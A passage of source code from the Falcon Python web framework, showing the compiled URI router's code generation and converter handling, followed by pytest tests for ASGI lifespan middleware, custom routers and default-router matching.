'avoid blocking the main request thread.'
)
msg = msg.format(responder)
raise TypeError(msg)
def _require_non_coroutine_responders(self, method_map):
for method, responder in method_map.items():
# NOTE(kgriffs): We don't simply wrap non-async functions
# since they likely peform relatively long blocking
# operations that need to be explicitly made non-blocking
# by the developer; raising an error helps highlight this
# issue.
if iscoroutinefunction(responder):
msg = (
'The {} responder must be a regular synchronous '
'method to be used with a WSGI app.'
)
msg = msg.format(responder)
raise TypeError(msg)
def _validate_template_segment(self, segment, used_names):
"""Validate a single path segment of a URI template.
1. Ensure field names are valid Python identifiers, since they
will be passed as kwargs to responders.
2. Check that there are no duplicate names, since that causes
(at least) the following problems:
a. For simple nodes, values from deeper nodes overwrite
values from more shallow nodes.
b. For complex nodes, re.compile() raises a nasty error
3. Check that when the converter syntax is used, the named
converter exists.
"""
for field in _FIELD_PATTERN.finditer(segment):
name = field.group('fname')
is_identifier = _IDENTIFIER_PATTERN.match(name)
if not is_identifier or name in keyword.kwlist:
msg_template = ('Field names must be valid identifiers '
'("{0}" is not valid)')
msg = msg_template.format(name)
raise ValueError(msg)
if name in used_names:
msg_template = ('Field names may not be duplicated '
'("{0}" was used more than once)')
msg = msg_template.format(name)
raise ValueError(msg)
used_names.add(name)
if field.group('cname_sep') == ':':
msg = 'Missing converter for field "{0}"'.format(name)
raise ValueError(msg)
name = field.group('cname')
if name:
if name not in self._converter_map:
msg = 'Unknown converter: "{0}"'.format(name)
raise ValueError(msg)
try:
self._instantiate_converter(self._converter_map[name], field.group('argstr'))
except Exception as e:
msg = 'Cannot instantiate converter "{}"'.format(name)
raise ValueError(msg) from e
def _generate_ast(self, nodes, parent, return_values, patterns, level=0, fast_return=True):
"""Generate a coarse AST for the router."""
# NOTE(kgriffs): Base case
if not nodes:
return
outer_parent = _CxIfPathLength('>', level)
parent.append_child(outer_parent)
parent = outer_parent
found_simple = False
# NOTE(kgriffs & philiptzou): Sort nodes in this sequence:
# static nodes(0), complex var nodes(1) and simple var nodes(2).
# so that none of them get masked.
nodes = sorted(
nodes, key=lambda node: node.is_var + (node.is_var and
not node.is_complex))
# NOTE(kgriffs): Down to this branch in the tree, we can do a
# fast 'return None'. See if the nodes at this branch are
# all still simple, meaning there is only one possible path.
if fast_return:
if len(nodes) > 1:
# NOTE(kgriffs): There's the possibility of more than
# one path.
var_nodes = [node for node in nodes if node.is_var]
found_var_nodes = bool(var_nodes)
fast_return = not found_var_nodes
for node in nodes:
if node.is_var:
if node.is_complex:
# NOTE(richardolsson): Complex nodes are nodes which
# contain anything more than a single literal or variable,
# and they need to be checked using a pre-compiled regular
# expression.
pattern_idx = len(patterns)
patterns.append(node.var_pattern)
construct = _CxIfPathSegmentPattern(level, pattern_idx,
node.var_pattern.pattern)
parent.append_child(construct)
parent = construct
if node.var_converter_map:
parent.append_child(_CxPrefetchGroupsFromPatternMatch())
parent = self._generate_conversion_ast(parent, node)
else:
parent.append_child(_CxSetParamsFromPatternMatch())
else:
# NOTE(kgriffs): Simple nodes just capture the entire path
# segment as the value for the param.
if node.var_converter_map:
assert len(node.var_converter_map) == 1
parent.append_child(_CxSetFragmentFromPath(level))
field_name = node.var_name
__, converter_name, converter_argstr = node.var_converter_map[0]
converter_class = self._converter_map[converter_name]
converter_obj = self._instantiate_converter(
converter_class,
converter_argstr
)
converter_idx = len(self._converters)
self._converters.append(converter_obj)
construct = _CxIfConverterField(
field_name,
converter_idx,
)
parent.append_child(construct)
parent = construct
else:
parent.append_child(_CxSetParam(node.var_name, level))
# NOTE(kgriffs): We don't allow multiple simple var nodes
# to exist at the same level, e.g.:
#
# /foo/{id}/bar
# /foo/{name}/bar
#
assert len([_node for _node in nodes
if _node.is_var and not _node.is_complex]) == 1
found_simple = True
else:
# NOTE(kgriffs): Not a param, so must match exactly
construct = _CxIfPathSegmentLiteral(level, node.raw_segment)
parent.append_child(construct)
parent = construct
if node.resource is not None:
# NOTE(kgriffs): This is a valid route, so we will want to
# return the relevant information.
resource_idx = len(return_values)
return_values.append(node)
self._generate_ast(
node.children,
parent,
return_values,
patterns,
level + 1,
fast_return
)
if node.resource is None:
if fast_return:
parent.append_child(_CxReturnNone())
else:
# NOTE(kgriffs): Make sure that we have consumed all of
# the segments for the requested route; otherwise we could
# mistakenly match "/foo/23/bar" against "/foo/{id}".
construct = _CxIfPathLength('==', level + 1)
construct.append_child(_CxReturnValue(resource_idx))
parent.append_child(construct)
if fast_return:
parent.append_child(_CxReturnNone())
parent = outer_parent
if not found_simple and fast_return:
parent.append_child(_CxReturnNone())
def _generate_conversion_ast(self, parent, node):
# NOTE(kgriffs): Unroll the converter loop into
# a series of nested "if" constructs.
for field_name, converter_name, converter_argstr in node.var_converter_map:
converter_class = self._converter_map[converter_name]
converter_obj = self._instantiate_converter(
converter_class,
converter_argstr
)
converter_idx = len(self._converters)
self._converters.append(converter_obj)
parent.append_child(_CxSetFragmentFromField(field_name))
construct = _CxIfConverterField(
field_name,
converter_idx,
)
parent.append_child(construct)
parent = construct
# NOTE(kgriffs): Add remaining fields that were not
# converted, if any.
if node.num_fields > len(node.var_converter_map):
parent.append_child(_CxSetParamsFromPatternMatchPrefetched())
return parent
def _compile(self):
"""Generate Python code for the entire routing tree.
The generated code is compiled and the resulting Python method
is returned.
"""
src_lines = [
'def find(path, return_values, patterns, converters, params):',
_TAB_STR + 'path_len = len(path)',
]
self._return_values = []
self._patterns = []
self._converters = []
self._ast = _CxParent()
self._generate_ast(
self._roots,
self._ast,
self._return_values,
self._patterns
)
src_lines.append(self._ast.src(0))
src_lines.append(
# PERF(kgriffs): Explicit return of None is faster than implicit
_TAB_STR + 'return None'
)
self._finder_src = '\n'.join(src_lines)
scope = {}
exec(compile(self._finder_src, '<string>', 'exec'), scope)
return scope['find']
def _instantiate_converter(self, klass, argstr=None):
if argstr is None:
return klass()
# NOTE(kgriffs): Don't try this at home. ;)
src = '{0}({1})'.format(klass.__name__, argstr)
return eval(src, {klass.__name__: klass})
def _compile_and_find(self, path, _return_values, _patterns, _converters, params):
"""Compile the router, set the `_find` attribute and return its result.
This method is set to the `_find` attribute to delay the compilation of the
router until it's used for the first time. Subsequent calls to `_find` will
be processed by the actual routing function.
This method must have the same signature as the function returned by the
:meth:`.CompiledRouter._compile`.
"""
with self._compile_lock:
if self._find == self._compile_and_find:
# NOTE(caselit): replace the find with the result of the router compilation
self._find = self._compile()
# NOTE(caselit): return_values, patterns, converters are reset by the _compile
# method, so the updated ones must be used
return self._find(
path, self._return_values, self._patterns, self._converters, params
)
class CompiledRouterNode:
"""Represents a single URI segment in a URI."""
def __init__(self, raw_segment,
method_map=None, resource=None, uri_template=None):
self.children = []
self.raw_segment = raw_segment
self.method_map = method_map
self.resource = resource
self.uri_template = uri_template
self.is_var = False
self.is_complex = False
self.num_fields = 0
# TODO(kgriffs): Rename these since the docs talk about "fields"
# or "field expressions", not "vars" or "variables".
self.var_name = None
self.var_pattern = None
self.var_converter_map = []
# NOTE(kgriffs): CompiledRouter.add_route validates field names,
# so here we can just assume they are OK and use the simple
# _FIELD_PATTERN to match them.
matches = list(_FIELD_PATTERN.finditer(raw_segment))
if not matches:
self.is_var = False
else:
self.is_var = True
self.num_fields = len(matches)
for field in matches:
# NOTE(kgriffs): We already validated the field
# expression to disallow blank converter names, or names
# that don't match a known converter, so if a name is
# given, we can just go ahead and use it.
if field.group('cname'):
self.var_converter_map.append(
(
field.group('fname'),
field.group('cname'),
field.group('argstr'),
)
)
if matches[0].span() == (0, len(raw_segment)):
# NOTE(kgriffs): Single field, spans entire segment
assert len(matches) == 1
# TODO(kgriffs): It is not "complex" because it only
# contains a single field. Rename this variable to make
# it more descriptive.
self.is_complex = False
field = matches[0]
self.var_name = field.group('fname')
else:
# NOTE(richardolsson): Complex segments need to be
# converted into regular expressions in order to match
# and extract variable values. The regular expressions
# contain both literal spans and named group expressions
# for the variables.
# NOTE(kgriffs): Don't use re.escape() since we do not
# want to escape '{' or '}', and we don't want to
# introduce any unexpected side-effects by escaping
# non-ASCII characters (it is probably safe, but let's
# not take that chance in a minor point release).
#
# NOTE(kgriffs): The substitution template parser in the
# re library does not look ahead when collapsing '\\':
# therefore in the case of r'\\g<0>' the first r'\\'
# would be consumed and collapsed to r'\', and then the
# parser would examine 'g<0>' and not realize it is a
# group-escape sequence. So we add an extra backslash to
# trick the parser into doing the right thing.
escaped_segment = re.sub(r'[\.\(\)\[\]\?\$\*\+\^\|]', r'\\\g<0>', raw_segment)
pattern_text = _FIELD_PATTERN.sub(r'(?P<\2>.+)', escaped_segment)
pattern_text = '^' + pattern_text + '$'
self.is_complex = True
self.var_pattern = re.compile(pattern_text)
if self.is_complex:
assert self.is_var
def matches(self, segment):
"""Return True if this node matches the supplied template segment."""
return segment == self.raw_segment
def conflicts_with(self, segment):
"""Return True if this node conflicts with a given template segment."""
# NOTE(kgriffs): This method assumes that the caller has already
# checked if the segment matches. By definition, only unmatched
# segments may conflict, so there isn't any sense in calling
# conflicts_with in that case.
assert not self.matches(segment)
# NOTE(kgriffs): Possible combinations are as follows.
#
# simple, simple ==> True
# simple, complex ==> False
# simple, string ==> False
# complex, simple ==> False
# complex, complex ==> (Maybe)
# complex, string ==> False
# string, simple ==> False
# string, complex ==> False
# string, string ==> False
#
other = CompiledRouterNode(segment)
if self.is_var:
# NOTE(kgriffs & philiptzou): Falcon does not accept multiple
# simple var nodes exist at the same level as following:
#
# /foo/{thing1}
# /foo/{thing2}
#
# Nor two complex nodes like this:
#
# /foo/{thing1}.{ext}
# /foo/{thing2}.{ext}
#
# On the other hand, those are all OK:
#
# /foo/{thing1}
# /foo/all
# /foo/{thing1}.{ext}
# /foo/{thing2}.detail.{ext}
#
if self.is_complex:
if other.is_complex:
return (_FIELD_PATTERN.sub('v', self.raw_segment) ==
_FIELD_PATTERN.sub('v', segment))
return False
else:
return other.is_var and not other.is_complex
# NOTE(kgriffs): If self is a static string match, then all the cases
# for other are False, so no need to check.
return False
class ConverterDict(UserDict):
"""A dict-like class for storing field converters."""
def update(self, other):
try:
# NOTE(kgriffs): If it is a mapping type, it should
# implement keys().
names = other.keys()
except AttributeError:
# NOTE(kgriffs): Not a mapping type, so assume it is an
# iterable of 2-item iterables. But we need to make it
# re-iterable if it is a generator, for when we pass
# it on to the parent's update().
other = list(other)
names = [n for n, __ in other]
for n in names:
self._validate(n)
UserDict.update(self, other)
def __setitem__(self, name, converter):
self._validate(name)
UserDict.__setitem__(self, name, converter)
def _validate(self, name):
if not _IDENTIFIER_PATTERN.match(name):
raise ValueError(
'Invalid converter name. Names may not be blank, and may '
'only use ASCII letters, digits, and underscores. Names'
'must begin with a letter or underscore.'
)
class CompiledRouterOptions:
"""Defines a set of configurable router options.
An instance of this class is exposed via :py:attr:`falcon.App.router_options`
and :py:attr:`falcon.asgi.App.router_options` for configuring certain
:py:class:`~.CompiledRouter` behaviors.
Attributes:
converters: Represents the collection of named
converters that may be referenced in URI template field
expressions. Adding additional converters is simply a
matter of mapping an identifier to a converter class::
app.router_options.converters['mc'] = MyConverter
The identifier can then be used to employ the converter
within a URI template::
app.add_route('/{some_field:mc}', some_resource)
Converter names may only contain ASCII letters, digits,
and underscores, and must start with either a letter or
an underscore.
Warning:
Converter instances are shared between requests.
Therefore, in threaded deployments, care must be taken
to implement custom converters in a thread-safe
manner.
(See also: :ref:`Field Converters <routing_field_converters>`)
"""
__slots__ = ('converters',)
def __init__(self):
self.converters = ConverterDict(
(name, converter) for name, converter in converters.BUILTIN
)
# --------------------------------------------------------------------
# AST Constructs
#
# NOTE(kgriffs): These constructs are used to create a very coarse
# AST that can then be used to generate Python source code for the
# router. Using an AST like this makes it easier to reason about
# the compilation process, and affords syntactical transformations
# that would otherwise be at best confusing and at worst extremely
# tedious and error-prone if they were to be attempted directly
# against the Python source code.
# --------------------------------------------------------------------
class _CxParent:
def __init__(self):
self._children = []
def append_child(self, construct):
self._children.append(construct)
def src(self, indentation):
return self._children_src(indentation + 1)
def _children_src(self, indentation):
src_lines = [
child.src(indentation)
for child in self._children
]
return '\n'.join(src_lines)
class _CxIfPathLength(_CxParent):
def __init__(self, comparison, length):
super(_CxIfPathLength, self).__init__()
self._comparison = comparison
self._length = length
def src(self, indentation):
template = '{0}if path_len {1} {2}:\n{3}'
return template.format(
_TAB_STR * indentation,
self._comparison,
self._length,
self._children_src(indentation + 1)
)
class _CxIfPathSegmentLiteral(_CxParent):
def __init__(self, segment_idx, literal):
super(_CxIfPathSegmentLiteral, self).__init__()
self._segment_idx = segment_idx
self._literal = literal
def src(self, indentation):
template = "{0}if path[{1}] == '{2}':\n{3}"
return template.format(
_TAB_STR * indentation,
self._segment_idx,
self._literal,
self._children_src(indentation + 1)
)
class _CxIfPathSegmentPattern(_CxParent):
def __init__(self, segment_idx, pattern_idx, pattern_text):
super(_CxIfPathSegmentPattern, self).__init__()
self._segment_idx = segment_idx
self._pattern_idx = pattern_idx
self._pattern_text = pattern_text
def src(self, indentation):
lines = [
'{0}match = patterns[{1}].match(path[{2}]) # {3}'.format(
_TAB_STR * indentation,
self._pattern_idx,
self._segment_idx,
self._pattern_text,
),
'{0}if match is not None:'.format(_TAB_STR * indentation),
self._children_src(indentation + 1),
]
return '\n'.join(lines)
class _CxIfConverterField(_CxParent):
def __init__(self, field_name, converter_idx):
super(_CxIfConverterField, self).__init__()
self._field_name = field_name
self._converter_idx = converter_idx
def src(self, indentation):
lines = [
'{0}field_value = converters[{1}].convert(fragment)'.format(
_TAB_STR * indentation,
self._converter_idx,
),
'{0}if field_value is not None:'.format(_TAB_STR * indentation),
"{0}params['{1}'] = field_value".format(
_TAB_STR * (indentation + 1),
self._field_name,
),
self._children_src(indentation + 1),
]
return '\n'.join(lines)
class _CxSetFragmentFromField:
def __init__(self, field_name):
self._field_name = field_name
def src(self, indentation):
return "{0}fragment = groups.pop('{1}')".format(
_TAB_STR * indentation,
self._field_name,
)
class _CxSetFragmentFromPath:
def __init__(self, segment_idx):
self._segment_idx = segment_idx
def src(self, indentation):
return '{0}fragment = path[{1}]'.format(
_TAB_STR * indentation,
self._segment_idx,
)
class _CxSetParamsFromPatternMatch:
def src(self, indentation):
return '{0}params.update(match.groupdict())'.format(
_TAB_STR * indentation
)
class _CxSetParamsFromPatternMatchPrefetched:
def src(self, indentation):
return '{0}params.update(groups)'.format(
_TAB_STR * indentation
)
class _CxPrefetchGroupsFromPatternMatch:
def src(self, indentation):
return '{0}groups = match.groupdict()'.format(
_TAB_STR * indentation
)
class _CxReturnNone:
def src(self, indentation):
return '{0}return None'.format(_TAB_STR * indentation)
class _CxReturnValue:
def __init__(self, value_idx):
self._value_idx = value_idx
def src(self, indentation):
return '{0}return return_values[{1}]'.format(
_TAB_STR * indentation,
self._value_idx
)
class _CxSetParam:
def __init__(self, param_name, segment_idx):
self._param_name = param_name
self._segment_idx = segment_idx
def src(self, indentation):
return "{0}params['{1}'] = path[{2}]".format(
_TAB_STR * indentation,
self._param_name,
self._segment_idx,
)
```
#### File: tests/asgi/test_lifespan_handlers.py
```python
import pytest
import falcon
from falcon import testing
from falcon.asgi import App
def test_at_least_one_event_method_required():
class Foo:
pass
app = App()
with pytest.raises(TypeError):
app.add_middleware(Foo())
def test_startup_only():
class Foo:
async def process_startup(self, scope, event):
self._called = True
foo = Foo()
app = App()
app.add_middleware(foo)
client = testing.TestClient(app)
client.simulate_get()
assert foo._called
def test_startup_raises():
class Foo:
def __init__(self):
self._shutdown_called = False
async def process_startup(self, scope, event):
raise Exception('testing 123')
async def process_shutdown(self, scope, event):
self._shutdown_called = True
class Bar:
def __init__(self):
self._startup_called = False
self._shutdown_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
self._shutdown_called = True
foo = Foo()
bar = Bar()
app = App()
app.add_middleware([foo, bar])
client = testing.TestClient(app)
with pytest.raises(RuntimeError) as excinfo:
client.simulate_get()
message = str(excinfo.value)
assert message.startswith('ASGI app returned lifespan.startup.failed.')
assert 'testing 123' in message
assert not foo._shutdown_called
assert not bar._startup_called
assert not bar._shutdown_called
def test_shutdown_raises():
class HandlerA:
def __init__(self):
self._startup_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
raise Exception('testing 321')
class HandlerB:
def __init__(self):
self._startup_called = False
self._shutdown_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
self._shutdown_called = True
a = HandlerA()
b1 = HandlerB()
b2 = HandlerB()
app = App()
app.add_middleware(b1)
app.add_middleware([a, b2])
client = testing.TestClient(app)
with pytest.raises(RuntimeError) as excinfo:
client.simulate_get()
message = str(excinfo.value)
assert message.startswith('ASGI app returned lifespan.shutdown.failed.')
assert 'testing 321' in message
assert a._startup_called
assert b1._startup_called
assert not b1._shutdown_called
assert b2._startup_called
assert b2._shutdown_called
def test_shutdown_only():
class Foo:
async def process_shutdown(self, scope, event):
self._called = True
foo = Foo()
app = App()
app.add_middleware(foo)
client = testing.TestClient(app)
client.simulate_get()
assert foo._called
def test_multiple_handlers():
counter = 0
class HandlerA:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
class HandlerB:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
class HandlerC:
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
class HandlerD:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
class HandlerE:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
async def process_request(self, req, resp):
self._called_request = True
app = App()
a = HandlerA()
b = HandlerB()
c = HandlerC()
d = HandlerD()
e = HandlerE()
app.add_middleware([a, b, c, d, e])
client = testing.TestClient(app)
client.simulate_get()
assert a._called_startup == 0
assert b._called_startup == 1
assert d._called_startup == 2
assert e._called_startup == 3
assert e._called_shutdown == 4
assert c._called_shutdown == 5
assert b._called_shutdown == 6
assert e._called_request
def test_asgi_conductor_raised_error_skips_shutdown():
class SomeException(Exception):
pass
class Foo:
def __init__(self):
self.called_startup = False
self.called_shutdown = False
async def process_startup(self, scope, event):
self.called_startup = True
async def process_shutdown(self, scope, event):
self.called_shutdown = True
foo = Foo()
app = App()
app.add_middleware(foo)
async def t():
with pytest.raises(SomeException):
async with testing.ASGIConductor(app):
raise SomeException()
falcon.invoke_coroutine_sync(t)
assert foo.called_startup
assert not foo.called_shutdown
```
#### File: falcon/tests/test_custom_router.py
```python
import pytest
import falcon
from falcon import testing
from _util import create_app # NOQA
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_add_route_should_be_used(asgi):
check = []
class CustomRouter:
def add_route(self, uri_template, *args, **kwargs):
check.append(uri_template)
def find(self, uri):
pass
app = create_app(asgi=asgi, router=CustomRouter())
app.add_route('/test', 'resource')
assert len(check) == 1
assert '/test' in check
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_find_should_be_used(asgi):
if asgi:
async def resource(req, resp, **kwargs):
resp.body = '{{"uri_template": "{0}"}}'.format(req.uri_template)
else:
def resource(req, resp, **kwargs):
resp.body = '{{"uri_template": "{0}"}}'.format(req.uri_template)
class CustomRouter:
def __init__(self):
self.reached_backwards_compat = False
def find(self, uri, req=None):
if uri == '/test/42':
return resource, {'GET': resource}, {}, '/test/{id}'
if uri == '/test/42/no-uri-template':
return resource, {'GET': resource}, {}, None
if uri == '/test/42/uri-template/backwards-compat':
return resource, {'GET': resource}, {}
if uri == '/404/backwards-compat':
self.reached_backwards_compat = True
return (None, None, None)
return None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test/42')
assert response.content == b'{"uri_template": "/test/{id}"}'
response = client.simulate_request(path='/test/42/no-uri-template')
assert response.content == b'{"uri_template": "None"}'
response = client.simulate_request(path='/test/42/uri-template/backwards-compat')
assert response.content == b'{"uri_template": "None"}'
for uri in ('/404', '/404/backwards-compat'):
response = client.simulate_request(path=uri)
assert response.text == falcon.HTTPNotFound().to_json()
assert response.status == falcon.HTTP_404
assert router.reached_backwards_compat
@pytest.mark.parametrize('asgi', [True, False])
def test_can_pass_additional_params_to_add_route(asgi):
check = []
class CustomRouter:
def add_route(self, uri_template, resource, **kwargs):
name = kwargs['name']
self._index = {name: uri_template}
check.append(name)
def find(self, uri):
pass
app = create_app(asgi=asgi, router=CustomRouter())
app.add_route('/test', 'resource', name='my-url-name')
assert len(check) == 1
assert 'my-url-name' in check
# NOTE(kgriffs): Extra values must be passed as kwargs, since that makes
# it a lot easier for overriden methods to simply ignore options they
# don't care about.
with pytest.raises(TypeError):
app.add_route('/test', 'resource', 'xarg1', 'xarg2')
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_takes_req_positional_argument(asgi):
if asgi:
async def responder(req, resp):
resp.body = 'OK'
else:
def responder(req, resp):
resp.body = 'OK'
class CustomRouter:
def find(self, uri, req):
if uri == '/test' and isinstance(req, falcon.Request):
return responder, {'GET': responder}, {}, None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test')
assert response.content == b'OK'
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_takes_req_keyword_argument(asgi):
if asgi:
async def responder(req, resp):
resp.body = 'OK'
else:
def responder(req, resp):
resp.body = 'OK'
class CustomRouter:
def find(self, uri, req=None):
if uri == '/test' and isinstance(req, falcon.Request):
return responder, {'GET': responder}, {}, None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test')
assert response.content == b'OK'
```
#### File: falcon/tests/test_default_router.py
```python
import textwrap
import pytest
from falcon import testing
from falcon.routing import DefaultRouter
from _util import create_app # NOQA
def client(asgi):
return testing.TestClient(create_app(asgi))
@pytest.fixture
def router():
router = DefaultRouter()
router.add_route(
'/repos', ResourceWithId(1))
router.add_route(
'/repos/{org}', ResourceWithId(2))
router.add_route(
'/repos/{org}/{repo}', ResourceWithId(3))
router.add_route(
'/repos/{org}/{repo}/commits', ResourceWithId(4))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}',
ResourceWithId(5))
router.add_route(
'/teams/{id}', ResourceWithId(6))
router.add_route(
'/teams/{id}/members', ResourceWithId(7))
router.add_route(
'/teams/default', ResourceWithId(19))
router.add_route(
'/teams/default/members/thing', ResourceWithId(19))
router.add_route(
'/user/memberships', ResourceWithId(8))
router.add_route(
'/emojis', ResourceWithId(9))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/full',
ResourceWithId(10))
router.add_route(
'/repos/{org}/{repo}/compare/all', ResourceWithId(11))
# NOTE(kgriffs): The ordering of these calls is significant; we
# need to test that the {id} field does not match the other routes,
# regardless of the order they are added.
router.add_route(
'/emojis/signs/0', ResourceWithId(12))
router.add_route(
'/emojis/signs/{id}', ResourceWithId(13))
router.add_route(
'/emojis/signs/42', ResourceWithId(14))
router.add_route(
'/emojis/signs/42/small.jpg', ResourceWithId(23))
router.add_route(
'/emojis/signs/78/small.png', ResourceWithId(24))
# Test some more special chars
router.add_route(
'/emojis/signs/78/small(png)', ResourceWithId(25))
router.add_route(
'/emojis/signs/78/small_png', ResourceWithId(26))
router.add_route('/images/{id}.gif', ResourceWithId(27))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/part',
ResourceWithId(15))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}', ResourceWithId(16))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}/full', ResourceWithId(17))
router.add_route(
'/gists/{id}/{representation}', ResourceWithId(21))
router.add_route(
'/gists/{id}/raw', ResourceWithId(18))
router.add_route(
'/gists/first', ResourceWithId(20))
router.add_route('/item/{q}', ResourceWithId(28))
# ----------------------------------------------------------------
# Routes with field converters
# ----------------------------------------------------------------
router.add_route(
'/cvt/teams/{id:int(min=7)}', ResourceWithId(29))
router.add_route(
'/cvt/teams/{id:int(min=7)}/members', ResourceWithId(30))
router.add_route(
'/cvt/teams/default', ResourceWithId(31))
router.add_route(
'/cvt/teams/default/members/{id:int}-{tenure:int}', ResourceWithId(32))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}...{usr1}:{branch1:int}/part',
ResourceWithId(33))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}', ResourceWithId(34))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}/full', ResourceWithId(35))
return router
class ResourceWithId:
def __init__(self, resource_id):
self.resource_id = resource_id
def __repr__(self):
return 'ResourceWithId({})'.format(self.resource_id)
def on_get(self, req, resp):
resp.body = self.resource_id
class SpamConverter:
def __init__(self, times, eggs=False):
self._times = times
self._eggs = eggs
def convert(self, fragment):
item = fragment
if self._eggs:
item += '&eggs'
return ', '.join(item for i in range(self._times))
# =====================================================================
# Regression tests for use cases reported by users
# =====================================================================
def test_user_regression_versioned_url():
router = DefaultRouter()
router.add_route('/{version}/messages', ResourceWithId(2))
resource, __, __, __ = router.find('/v2/messages')
assert resource.resource_id == 2
router.add_route('/v2', ResourceWithId(1))
resource, __, __, __ = router.find('/v2')
assert resource.resource_id == 1
resource, __, __, __ = router.find('/v2/messages')
assert resource.resource_id == 2
resource, __, __, __ = router.find('/v1/messages')
assert resource.resource_id == 2
route = router.find('/v1')
assert route is None
def test_user_regression_recipes():
router = DefaultRouter()
router.add_route(
'/recipes/{activity}/{type_id}',
ResourceWithId(1)
)
router.add_route(
'/recipes/baking',
ResourceWithId(2)
)
resource, __, __, __ = router.find('/recipes/baking/4242')
assert resource.resource_id == 1
resource, __, __, __ = router.find('/recipes/baking')
assert resource.resource_id == 2
route = router.find('/recipes/grilling')
assert route is None
@pytest.mark.parametrize('uri_template,path,expected_params', [
('/serviceRoot/People|{field}', '/serviceRoot/People|susie', {'field': 'susie'}),
('/serviceRoot/People[{field}]', "/serviceRoot/People['calvin']", {'field': "'calvin'"}),
('/serviceRoot/People({field})', "/serviceRoot/People('hobbes')", {'field': "'hobbes'"}),
('/serviceRoot/People({field})', "/serviceRoot/People('hob)bes')", {'field': "'hob)bes'"}),
('/serviceRoot/People({field})(z)', '/serviceRoot/People(hobbes)(z)', {'field': 'hobbes'}),
("/serviceRoot/People('{field}')", "/serviceRoot/People('rosalyn')", {'field': 'rosalyn'}),
('/^{field}', '/^42', {'field': '42'}),
('/+{field}', '/+42', {'field': '42'}),
(
'/foo/{first}_{second}/bar',
'/foo/abc_def_ghijk/bar',
# NOTE(kgriffs): The regex pattern is greedy, so this is
# expected. We can not change this behavior in a minor
# release, since it would be a breaking change. If there
# is enough demand for it, we could introduce an option
# to toggle this behavior.
{'first': 'abc_def', 'second': 'ghijk'},
),
# NOTE(kgriffs): Why someone would use a question mark like this
# I have no idea (esp. since it would have to be encoded to avoid
# being mistaken for the query string separator). Including it only
# for completeness.
('/items/{x}?{y}', '/items/1080?768', {'x': '1080', 'y': '768'}),
('/items/{x}|{y}', '/items/1080|768', {'x': '1080', 'y': '768'}),
('/items/{x},{y}', '/items/1080,768', {'x': '1080', 'y': '768'}),
('/items/{x}^^{y}', '/items/1080^^768', {'x': '1080', 'y': '768'}),
('/items/{x}*{y}*', '/items/1080*768*', {'x': '1080', 'y': '768'}),
('/thing-2/something+{field}+', '/thing-2/something+42+', {'field': '42'}),
('/thing-2/something*{field}/notes', '/thing-2/something*42/notes', {'field': '42'}),
(
'/thing-2/something+{field}|{q}/notes',
'/thing-2/something+else|z/notes',
{'field': 'else', 'q': 'z'},
),
(
"serviceRoot/$metadata#Airports('{field}')/Name",
"serviceRoot/$metadata#Airports('KSFO')/Name",
{'field': 'KSFO'},
),
])
def test_user_regression_special_chars(uri_template, path, expected_params):
router = DefaultRouter()
router.add_route(uri_template, ResourceWithId(1))
route = router.find(path)
assert route is not None
resource, __, params, __ = route
assert resource.resource_id == 1
assert params == expected_params
# =====================================================================
# Other tests
# =====================================================================
@pytest.mark.parametrize('asgi', [True, False])
@pytest.mark.parametrize('uri_template', [
{},
set(),
object()
])
def test_not_str(asgi, uri_template):
app = create_app(asgi)
with pytest.raises(TypeError):
app.add_route(uri_template, ResourceWithId(-1))
def test_root_path():
router = DefaultRouter()
router.add_route('/', ResourceWithId(42))
resource, __, __, __ = router.find('/')
assert resource.resource_id == 42
expected_src = textwrap.dedent("""
def find(path, return_values, patterns, converters, params):
path_len = len(path)
if path_len > 0:
if path[0] == '':
if path_len == 1:
return return_values[0]
return None
return None
return None
""").strip()
assert router.finder_src == expected_src
@pytest.mark.parametrize('uri_template', [
'/{field}{field}',
'/{field}...{field}',
'/{field}/{another}/{field}',
'/{field}/something/something/{field}/something',
])
def test_duplicate_field_names(uri_template):
router = DefaultRouter()
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(1))
@pytest.mark.parametrize('uri_template,path', [
('/items/thing', '/items/t'),
('/items/{x}|{y}|', '/items/1080|768'),
('/items/{x}*{y}foo', '/items/1080*768foobar'),
('/items/{x}*768*', '/items/1080*768***'),
])
def test_match_entire_path(uri_template, path):
router = DefaultRouter()
router.add_route(uri_template, ResourceWithId(1))
route = router.find(path)
assert route is None
@pytest.mark.parametrize('uri_template', [
'/teams/{conflict}', # simple vs simple
'/emojis/signs/{id_too}', # another simple vs simple
'/repos/{org}/{repo}/compare/{complex}:{vs}...{complex2}:{conflict}',
'/teams/{id:int}/settings', # converted vs. non-converted
])
def test_conflict(router, uri_template):
